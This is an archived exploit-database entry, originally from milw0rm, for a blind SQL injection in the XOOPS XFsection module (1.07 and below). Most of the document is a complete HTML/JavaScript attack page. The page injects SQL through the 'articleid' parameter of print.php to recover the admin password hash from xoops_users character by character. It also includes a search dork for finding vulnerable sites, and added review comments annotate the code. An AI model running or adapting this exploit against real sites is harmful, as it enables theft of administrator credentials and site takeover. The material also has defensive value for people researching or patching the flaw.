vendor:
Module XFsection
by:
ajann
7.5
CVSS
HIGH
BLIND SQL Injection
CWE
Product Name: Module XFsection
Affected Version From: 1.07 or below
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit

This exploit allows an attacker to perform a blind SQL injection attack on the XOOPS Module XFsection version 1.07 or below. The vulnerability can be exploited by manipulating the 'articleid' parameter in the 'print.php' file. The exploit script sends a GET request to the target URL with the manipulated parameter and checks the response for specific HTML tags to determine whether the injection was successful.

Mitigation:

Upgrade to a patched version of the XOOPS Module XFsection. Note that the metadata above records no existing patch, so confirm that a fixed release is actually available before relying on an upgrade alone.
Source

Exploit-DB raw data:

<html>
<head>
<title>XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</title>

<script type="text/javascript">

//'===============================================================================================
//'[Script Name: XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
//'[Coded by   : ajann
//'[Author     : ajann
//'[Contact    : :(
//'[Dork       : inurl:/modules/xfsection/
//'[S.Page     : http://linux2.ohwada.net/
//'[$$         : Free
//'[Using      : Write Target after Submit Click
//'===============================================================================================


   // Creates the XMLHttpRequest-style object used for every request.
   // Chooses by navigator.appName: Internet Explorer gets the legacy
   // ActiveX "Microsoft.XMLHTTP" object, any other browser the native
   // XMLHttpRequest. Returns the object it created.
   function nesneyarat() {
     var ieMi = navigator.appName == "Microsoft Internet Explorer";
     return ieMi ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
   }

 // Single shared request object, created once at script load and reused by
 // islemlink() for every request; cevapFonksiyonu() reads its state.
 var http = nesneyarat();



   // Builds one request URL from the form fields and sends it as a plain GET.
   //   adresyolla: text appended directly after the articleid value; dal()
   //               passes the SQL fragment here. It travels unmodified in the
   //               query string, so it is visible verbatim in server access logs.
   //   charyolla:  concatenated onto the 'karakter' field value. dal() calls this
   //               function with a single argument, so charyolla is undefined
   //               and the literal text "undefined" ends up in karakterim.
   // Resulting URL: adresim + path + "/modules/xfsection/print.php?articleid="
   //               + genreid + adresyolla + karakterim.
   // The response is handled asynchronously by cevapFonksiyonu().
   // NOTE(review): none of the variables below are declared with var, so each
   // becomes a global in sloppy mode. The getElementById lookups target inputs
   // that the markup gives a name= but no id=; presumably this only resolved in
   // older browsers that matched name= from getElementById — verify.
   function islemlink(adresyolla,charyolla) {

genreidim=document.getElementById('genreid').value
file="/modules/xfsection/print.php?articleid=" + genreidim
pathim=document.getElementById('path').value + file
karakterim=document.getElementById('karakter').value + charyolla
adres=document.getElementById('adresim').value + pathim +  adresyolla + karakterim


 

 http.open('get', adres);
 http.onreadystatechange = cevapFonksiyonu;
 http.send(null);
   

}



   // onreadystatechange handler for the shared http object. Once the request
   // has completed (readyState 4) the response body is copied into the hidden
   // 'mesaj' textarea and yonlendir() is asked to interpret it.
   function cevapFonksiyonu() {
     if (http.readyState != 4) {
       return;
     }
     var mesajAlani = document.getElementById('mesaj');
     mesajAlani.value = http.responseText;
     yonlendir();
   }



// Interprets the response text stored in the 'mesaj' textarea. The presence
// of the marker span is reported as 'TRUEEEEEEE', its absence as 'False';
// the verdict is shown only through alert(), nothing is stored.
function yonlendir() {
  var isaret = '<span style="font-size: large;">';
  var govde = document.getElementById('mesaj').value;
  if (govde.indexOf(isaret, 0) != -1) {
    alert('TRUEEEEEEE');
  } else {
    alert('False');
  }
}

// Click handler for the 'buton' input. The button's own value string is the
// state: each branch matches the current label, disables the button, sends
// one request through islemlink(), relabels the button with the next
// candidate, re-enables it after 2000 ms and returns false.
// Candidate order is 0-9 then a-f (ascii 48-57, then 97-102); after 'f' the
// label becomes "Finished" and no branch matches further clicks.
// Every request carries the same SQL fragment except for the ascii value at
// its end; the outcome is only reported by the alert raised in yonlendir().
// islemlink() is always called with one argument here, so its second
// parameter is undefined inside that function.
// NOTE(review): setTimeout is handed a code string instead of a function, and
// the branches differ only in label and ascii value — the body is pure
// repetition.
function dal() {

if (document.getElementById('buton').value == "Test Character(0)") {
 
 // Disable first so a second click cannot fire before the timeout re-enables.
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
   // Advance the state machine to the next candidate label.
   document.getElementById('buton').value = "Test Character(1)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(1)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=49)/*');
   document.getElementById('buton').value = "Test Character(2)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(2)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=50)/*');
   document.getElementById('buton').value = "Test Character(3)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(3)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=51)/*');
   document.getElementById('buton').value = "Test Character(4)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(4)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=52)/*');
   document.getElementById('buton').value = "Test Character(5)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(5)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=53)/*');
   document.getElementById('buton').value = "Test Character(6)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(6)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=54)/*');
   document.getElementById('buton').value = "Test Character(7)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(7)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=55)/*');
   document.getElementById('buton').value = "Test Character(8)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(8)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=56)/*');
   document.getElementById('buton').value = "Test Character(9)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(9)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=57)/*');
   // Digits exhausted: the next candidates are the lowercase hex letters.
   document.getElementById('buton').value = "Test Character(a)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(a)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=97)/*');
   document.getElementById('buton').value = "Test Character(b)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(b)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=98)/*');
   document.getElementById('buton').value = "Test Character(c)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(c)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=99)/*');
   document.getElementById('buton').value = "Test Character(d)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(d)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=100)/*');
   document.getElementById('buton').value = "Test Character(e)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(e)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=101)/*');
   document.getElementById('buton').value = "Test Character(f)"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }

if (document.getElementById('buton').value == "Test Character(f)") {
 
 document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=102)/*');
   // Terminal state: no branch matches "Finished", so further clicks do nothing.
   document.getElementById('buton').value = "Finished"
 setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;

 }



  }


</script>

   </head>

 <!-- Input form read by the script above. The script looks the fields up with
      getElementById('adresim'|'path'|'karakter'|'genreid'|'buton'|'mesaj'),
      but every control below carries only a name= attribute and no id=; that
      presumably only resolved in older browsers that matched name= from
      getElementById - verify before assuming the page works as published. -->
 <body bgcolor="#000000">

<center>

<p><b><font face="Verdana" size="2" color="#008000">XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit</font></b></p>

<p></p>
    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/</font><font color="#00FF00" size="2" face="Arial">
  </font><font color="#FF0000" size="2">&nbsp;</font></b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  <input type="text" name="adresim" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="http://"></p>
<br>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Path:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]&nbsp;&nbsp;&nbsp; </font></b>
  <input type="text" name="path" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="/">
  <p>
    <b><font face="Arial" size="1" color="#FF0000">&nbsp;Character:</font><font face="Arial" size="1" color="#808080">[Md5 
  Character 1-32]&nbsp;&nbsp; </font></b>
  <input type="text" name="karakter" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <p>
    <b><font face="Arial" size="1" color="#FF0000">Article Id:</font><font face="Arial" size="1" color="#808080">[print.php?articleid=]&nbsp;&nbsp; </font></b>
  <input type="text" name="genreid" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';" value="1">
</p>
  <!-- No enclosing <form>, so this submit input submits nothing; only the
       inline onclick handler (dal()) runs. -->
  <p><input type="submit" value="Test Character(0)" name="buton" onclick="dal();"></p>
<br>
<!-- Hidden textarea that cevapFonksiyonu() fills with the response text.
     Its closing tag is written as entities (&lt;/textarea&gt;), so the element
     is never closed here and the remaining markup is parsed as its content;
     likely a publishing artifact - compare with the original file. -->
<textarea name="mesaj" rows="1" cols="20" style="visibility:hidden">&lt;/textarea&gt; <br>
<p>

<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>
</p>
</center>


 </body>
 </html>

# milw0rm.com [2007-04-02]